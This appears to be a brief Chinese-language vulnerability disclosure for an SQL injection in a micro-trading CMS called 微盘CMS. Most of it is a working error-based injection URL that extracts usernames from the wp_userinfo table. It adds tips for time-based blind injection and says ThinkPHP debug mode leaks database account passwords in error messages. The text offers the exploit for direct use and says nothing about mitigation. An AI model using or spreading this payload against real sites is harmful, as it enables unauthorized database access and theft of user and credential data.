【微交易】微盘CMS某处SQL注入漏洞

https://url/index/goods/goods/pid/23)and(select+extractvalue(2,+concat(0x7e,+substring((select+group_concat(username)+from+wp_userinfo),+1,+32))))--+/

加个单引号也行，微盘此处注入无限制

未开启debug模式的情况可使用时间盲注测试

thinkphp开启debug模式的情况下，报错信息会显示数据库账号密码